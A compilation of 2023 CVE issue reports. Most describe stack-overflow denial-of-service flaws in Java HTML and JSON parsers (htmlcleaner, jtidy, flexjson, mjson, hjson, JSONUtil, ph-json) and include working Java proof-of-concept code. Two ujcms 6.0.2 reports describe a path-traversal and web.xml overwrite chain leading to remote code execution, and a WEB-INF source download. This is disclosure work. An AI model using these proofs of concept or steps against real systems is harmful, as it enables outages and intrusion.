An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by htmlcleaner parsing of untrusted HTML String****Description**

Using htmlcleaner to parse untrusted HTML String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
    	at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
    	at java.base/java.util.HashSet.iterator(HashSet.java:173)
    	at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    
    
    

**PoC**

        <dependency\>
            <groupId\>net.sourceforge.htmlcleaner</groupId\>
            <artifactId\>htmlcleaner</artifactId\>
            <version\>2.28</version\>
        </dependency\>

import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try {

            // 模糊测试组件的风险接口
            HtmlCleaner cleaner = new HtmlCleaner();
            TagNode root = cleaner.clean(htmlData);

            // 对解析结果进行进一步操作
            // ...

        } catch (Exception e) {
            // 处理异常
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34624: Stack overflow error caused by htmlcleaner parsing of untrusted HTML String · Issue #13 · amplafi/htmlcleaner

Directory traversal vulnerability in ujcms 6.0.2 allows attackers to move files via the rename feature.

\[Vulnerability description\]  
The Remote Code Execution (RCE) vulnerability exists in ujcms v6.0.2, when the project is partially configured on Linux using Tomcat, attackers can use path traversal and arbitrary file uploads to execute arbitrary code.

\[Vulnerability Type\]  
Remote Code Execution (RCE)

\[Vendor of Product\]  
https://gitee.com/ujcms/ujcms  
https://github.com/ujcms/ujcms  
https://www.ujcms.com/

\[Affected Product Code Base\]  
v6.0.2

\[Vulnerability proof\]  
The code restricts the access and execution of jsp and jspx files, but it exists in any path and any file upload, so you can upload a web.xml file and add a jsp resolvable suffix, such as abc

    <servlet-mapping>
        <servlet-name>jsp</servlet-name>
        <url-pattern>*.abc</url-pattern>
    </servlet-mapping>
    

Condition: It needs to be deployed with tomcat on Linux, and the configuration file cannot be overwritten on Windows, and File.renameTo is used

1.  Upload web.xml  
    Download an initial configuration file web.xml of tomcat, and add the above configuration in the following location  
      
    Upload the web.xml file to the uploads directory first, and use the path id to indicate it when uploading, and the path cannot be traversed  
      
    Rename, the capture package can traverse the path at the file name, and overwrite the original web.xml  
    
2.  Upload the Trojan horse  
    Upload a Trojan horse and execute the ping command. At this time, the uploaded suffix cannot be the custom analytical suffix above. You can upload any suffix and rename it later, otherwise the upload will not succeed  
      
    The upload suffix is ​​abc1  
      
    Renamed to ../../123.abc, the path traverses to the root directory  
      
    Visit 123.abc and successfully trigger rce  
    

\[Code Details\]

1.  Upload  
    Track the rename interface, find that the parameters are being passed to doUpload, and verify the suffix at the upload  
    com.ujcms.cms.core.web.backendapi.AbstractUploadController#doUpload  
      
    The suffix can be uploaded without any problem.
    
2.  Rename  
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#rename is the same as upload, it has checkName to verify the file name, enter here to view the code  
      
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkName(java.lang.String) Check the file name, when both meet  
    (1) The file name is empty  
    (2) The file name contains illegal characters  
    an exception is thrown, but the first condition is always false, and the conditions cannot be met at the same time, so this verification will always be bypassed, so it can be executed, and then any file can be renamed and uploaded.  
      
    So there is a problem with the judgment logic here, it should be || instead of &&, which leads to the failure of the security check in this place. Of course, this is also the reason why it can be used successfully.  
    After passing the verification of this block, use File.renameTo in com.ujcms.util.file.LocalFileHandler#rename to rename the file.  
      
    renameTo cannot overwrite files in Windows, but can overwrite and create directories in Linux, so this vulnerability can only be exploited in Linux.

CVE-2023-34865: There is a remote code execution (RCE) vulnerability exists in ujcms v6.0.2 · Issue #5 · ujcms/ujcms

An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jtidy parsing of untrusted Html String****Description**

Using jtidy to parse untrusted Html String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
    	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
    	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
    	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
    	at java.base/java.lang.String.<init>(String.java:467)
    	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
    	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.jtidy</groupId\>
            <artifactId\>jtidy</artifactId\>
            <version\>r938</version\>
        </dependency\>

import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try (StringReader stringReader = new StringReader(htmlData);){
            Tidy tidy = new Tidy();
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34623: Stack overflow error caused by jtidy parsing of untrusted Html String · Issue #4 · trajano/jtidy

An issue was discovered in Ujcms v6.0.2 allows attackers to gain sensitive information via the dir parameter to /api/backend/core/web-file-html/download-zip.

\[Vulnerability description\]

Ujcms v6.0.2 has a sensitive file reading problem. When using Tomcat to deploy the project, the background zip package downloads the html directory, and modifying the dir parameter causes the source code and configuration files to be downloaded

\[Vulnerability Type\]  
Sensitive file reading(Information Disclosure)

\[Vendor of Product\]  
https://gitee.com/ujcms/ujcms  
https://github.com/ujcms/ujcms  
https://www.ujcms.com/

\[Affected Product Code Base\]  
v6.0.2

\[Vulnerability proof\]

Condition: tomcat deployment project

The dir parameter is allowed to be set to "WEB-INF/", and the names parameter is allowed to be set to "classes", so that the source code and web configuration files can be downloaded directly.(There is no html directory by default, you can create it directly through the function)

\[Code Details\]

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#downloadZip  
The code checks the two parameters "dir" and "names" separately

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkId(java.lang.String)  
Check whether there is directory traversal, no restrictions on accessible directories

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkName(java.lang.String)Check the file name, when both meet  
(1) The file name is empty  
(2) The file name contains illegal characters  
Accessible directories are not restricted

CVE-2023-34878: Ujcms v6.0.2 has a sensitive file reading problem · Issue #6 · ujcms/ujcms

An issue was discovered flexjson thru 3.3 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by flexjson serialization List****Description**

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

**PoC**

<dependency>
<groupId>net.sf.flexjson</groupId>
<artifactId>flexjson</artifactId>
<version>3.3</version>
</dependency>

importflexjson.JSONSerializer;

importjava.util.ArrayList;

publicclass PoC3{
publicstaticvoidmain(String[]args){

ArrayList<Object>list=newArrayList<>();
list.add(list);

Strings=newJSONSerializer().deepSerialize(list);
}
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  https://github.com/jettison-json/jettison/issues/52
2.  https://github.com/jettison-json/jettison/pull/53/files

CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered mjson thru 1.4.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by mjson parsing of untrusted JSON String****Description**

Using mjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.lang.ThreadLocal.get(ThreadLocal.java:165)
    	at mjson.Json.factory(Json.java:1192)
    	at mjson.Json.array(Json.java:1291)
    	at mjson.Json$Reader.readArray(Json.java:2787)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    
    

**PoC**

        <dependency\>
            <groupId\>org.sharegov</groupId\>
            <artifactId\>mjson</artifactId\>
            <version\>1.4.1</version\>
        </dependency\>

import mjson.Json;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        Json.read(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34611: Stack overflow error caused by mjson parsing of untrusted JSON String · Issue #40 · bolerio/mjson

An issue was discovered hjson thru 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by hjson parsing of untrusted JSON String****Description**

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at org.hjson.HjsonParser.read(HjsonParser.java:454)
    	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    
    

**PoC**

        <dependency\>
            <groupId\>org.hjson</groupId\>
            <artifactId\>hjson</artifactId\>
            <version\>3.0.0</version\>
        </dependency\>

import org.hjson.JsonValue;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = "{" + \_nestedDoc(TOO\_DEEP\_NESTING, "a : { ", "} ", "") + "}";


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonValue.readHjson(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34620: Stack overflow error caused by hjson parsing of untrusted JSON String  (2) · Issue #24 · hjson/hjson-java

An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jsonutil parsing of untrusted JSON String****Description**

Using jsonutil to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.pwall.util.ParseText.skipSpaces(ParseText.java:1072)
    	at net.pwall.json.JSON.parse(JSON.java:535)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    
    

**PoC**

        <dependency\>
            <groupId\>net.pwall.json</groupId\>
            <artifactId\>jsonutil</artifactId\>
            <version\>5.0</version\>
        </dependency\>

import net.pwall.json.JSON;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JSON.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34615: Stack overflow error caused by jsonutil parsing of untrusted JSON String · Issue #10 · billdavidson/JSONUtil

An issue was discovered ph-json thru 9.5.5 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by ph-json parsing of untrusted JSON String****Description**

Using ph-json to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.ArrayList.get(ArrayList.java:459)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:201)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:186)
    	at com.helger.commons.collection.NonBlockingStack.peek(NonBlockingStack.java:112)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addToStackPeek(CollectingJsonParserHandler.java:51)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addSimple(CollectingJsonParserHandler.java:71)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addCollection(CollectingJsonParserHandler.java:76)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler.onArrayStart(CollectingJsonParserHandler.java:115)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:804)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:820)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
    
    

**PoC**

        <dependency\>
            <groupId\>com.helger</groupId\>
            <artifactId\>ph-json</artifactId\>
            <version\>9.5.5</version\>
        </dependency\>

import com.helger.json.serialize.JsonReader;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonReader.readFromString(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
